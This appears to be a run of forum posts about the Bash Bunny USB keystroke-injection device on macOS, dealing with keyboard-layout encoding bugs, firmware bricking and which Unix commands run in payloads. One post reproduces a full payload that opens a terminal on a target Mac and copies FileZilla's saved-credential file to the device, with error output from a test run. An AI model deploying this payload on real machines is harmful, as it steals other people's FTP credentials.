quentin_lamamy

well, the mechanic switch is OK, you can use the 3 position ?

I am on OSX and i need to create a new keyboard layout for the mac keyboard. Does someone know how to create it ?

issue solved, i have to create a new json that match the osx keyboard layout (i don't know how but i need), until i learn how to create a new keyboard layout i just change the system keyboard layout to a classic FR PC Azerty

Don't work anymore , Whaaaaaaat ! . Welllll, does something change in the new firmware ??? DUCKY_LANG fr [...] Q STRING printf '\e[2t' Q ENTER Result printf ¡e{2t

Yes all this classic command will work, i try all the "uncommon" command and try them to help the future BB noob like me Next unix command test : export export FOO="BAR" Q STRING $FOO # Will print, as expected BAR in the current focused window export PS1="bashbunny>" # Will do nothing I have little idea on why it don't change my terminal prompt, it may be a kind of scope issue. Something like the var is set for the actual running script on the BB and not for the current opened terminal. I use to success to make this work with Q STRING en Q ENTER, but now it sucks with some encoding issue # Print this command in terminal in order to be in the "good scope" Q STRING "export PS1='bashbunny >'" Q ENTER but the unexpected result is export PS1-'bashbunny #' encoding PB solve with a new OSX keyboard layout

Yes, i know it sucks to do this way, now i use /root/udisk. At the moment i have tested 2 unix command that works, mkdir and source

I will be happy to help you, but please use one topic for one subject, it will help people in the future.

If the character is on your keyboard layout you have to set the keyboard layout in your script DUCKY_LANG fr and add the right json according to your keyboard layout in the language folder If the character is not on your keyboard i think it's possible to use the ascii or the hexa code, but you have to wait for a more skilled BB user to have this info.

i think there is one, but i don't have the answer. Please wait for someone else who have more hardware BB skill

Hi, If i good understand you need to use the Ñ character ?

after the solid green (means that bb is rebooting) you have to wait for a blue blinking Here is the procedure. It seems that you unplug it during the reboot, i think you brick your BB. I'm still a kind of BB noob and have no more info for you. Wait for a BB god to have more info

What was the process step by step you use to upgrade ? In which mode are you when you plug your BB ? Arming ?

It seems that you can restore your BB https://forums.hak5.org/index.php?/topic/40293-i-may-killed-it/#comment-287106, never test

Just try and yes tadaa i have my folder, but in my case it don't work ? #!/bin/bash ############################################################################### # _____ _____ _____ _____ _____ _____ _____ _____ __ __ # # (\___/) | __ || _ || __|| | | | __ || | || | || | || | | # # (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _| # # (")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| # # Bash Bunny by Hak5 USB Attack/Automation Platform # # # ############################################################################### # # # Title: Filezilla credential exfiltration # # Author: Quentin Lamamy <contact@quentin-lamamy.fr> # # Description Exfiltrate filezilla credential # # Version: 1.0 # # Platform OSX # # # ############################################################################### ##################### # Setup the payload # ##################### LED SETUP rootDir=/Volumes/BashBunny lootDir=$rootDir/loot/exfiltration/filezilla DUCKY_LANG fr GET SWITCH_POSITION ATTACKMODE HID STORAGE ##################### # Attack the target # ##################### LED ATTACK Q CTRL SPACE Q STRING terminal Q ENTER Q STRING source $rootDir/payloads/$SWITCH_POSITION/shell.sh Q ENTER Q STRING shell.init Q ENTER Q STRING mkdir -p $lootDir Q ENTER Q STRING source $rootDir/payloads/$SWITCH_POSITION/filezillaExfiltration.sh; Q ENTER Q STRING filezilla.exfiltration $lootDir Q ENTER #Q STRING clear #Q ENTER QUACK STRING source $rootDir/payloads/$SWITCH_POSITION/footer.sh QUACK ENTER # Close terminal #QUACK STRING killall Terminal #QUACK ENTER LED FINISH ################################################################################# # (\___/) Find further documentation, repository of payloads, (\___/) # # (='.'=) tutorial videos and community support forums at (='.'=) # # (")_(") bashbunny.com. (C) Hak5 LLC (")_(") # ################################################################################# cp: /Volumes/BashBunny/loot/exfiltration/filezilla/quentin_sitemanager.xml: No such file or directory It's not the better way to do QUACK mkdir ..... and QUACK ENTER, but it should work no ?

Yes here is my complete payload hearder LED SETUP rootDir=/Volumes/BashBunny lootDir=$rootDir/loot/exfiltration/ DUCKY_LANG fr GET SWITCH_POSITION ATTACKMODE HID STORAGE

Here is the result of some test TEST 1 : Print the command in shell and press enter rootDir=/Volumes/BashBunny lootDir=$rootDir/loot/exfiltration/ [...] Q STRING mkdir -p $lootDir Q ENTER The result : No folder creation and this result in the console bashbunny> mkdir §p /Volumes/BashBunny/loot/exfiltration/ mkdir: §p: File exists Why this error ? Don't know because the file doesn't exist, And why my mkdir -p become mkdir: §p ?

well... thks but what is the link with the question ? ^^

it's just in my switch1 folder like any other payload (not in serial console) And i test this weird path because i see it in this payload (when i don't have enough documentation or data, i try to learn from the existing script). But it seems that it's not the good way to create a folder (before moving file inside during exfiltration)

Ok, hoist the white flag xD I just try try this command mkdir -p /root/udisk/loot/exfiltration nothing, no folder, a total void ^^ but if i use this command Q STRING mkdir -p /Volumes/BashBunny/loot/exfiltration Q ENTER it work's \o/ for me it's the same, i just want to understand where is my mistake. Thks

Thks for the tutorial... and the respect..... I'm not aware of the internal software and hardware of the BB. Just tell me that bb is a linux computer in a USB key, it's enough , i don't need help to know the command list available on unix, and i don't need your disdain.

There is a list somewhere ? I can't find this information on the wiki

but it's a nix command ? It's a custom function interpreted by the BB to create folder only on the BB ? If yes, it's not a good choice to keep the same function name

For information i resolve the issue with a printf inside a function. Well... no it don't work anymore, and forget to enable the versioning

Hi there, I have a little question, i love my bash bunny, create a lot of payloads (i will post them when really finished), but still have some question. Actually for all my payload i open a terminal, minimize it and do my stuff. When i look at this kind of payload , on line 24 there is a unix command "mkdir". So, it's possible to use unix command without a terminal ? Reminder for people who read this topic, working unix command in payload : mkdir source export

I try on another target computer and still don't work.. May be a bug with the bash bunny script ?